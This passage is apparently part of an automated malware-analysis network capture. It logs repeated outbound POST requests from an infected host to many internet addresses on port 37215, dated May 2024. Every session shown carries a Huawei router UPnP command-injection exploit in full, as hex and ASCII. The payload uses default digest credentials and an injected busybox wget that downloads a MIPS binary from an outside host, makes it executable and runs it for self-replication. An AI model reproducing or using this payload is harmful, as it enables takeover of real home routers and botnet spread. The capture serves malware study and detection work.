[TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1255192.168.2.2355466157.235.152.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327847004 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1256192.168.2.234786841.38.184.11737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327869892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1257192.168.2.2335600188.190.210.23937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327888012 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1258192.168.2.2343738197.67.199.10737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327898979 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1259192.168.2.235334441.250.126.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327914953 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1260192.168.2.2351690157.189.117.21337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327933073 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1261192.168.2.235971841.17.167.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327949047 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1262192.168.2.2340588157.56.182.24437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327955961 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1263192.168.2.233998441.168.180.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.327980995 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1264192.168.2.2344358138.84.236.16137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328001976 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1265192.168.2.2341542157.212.110.2637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328013897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
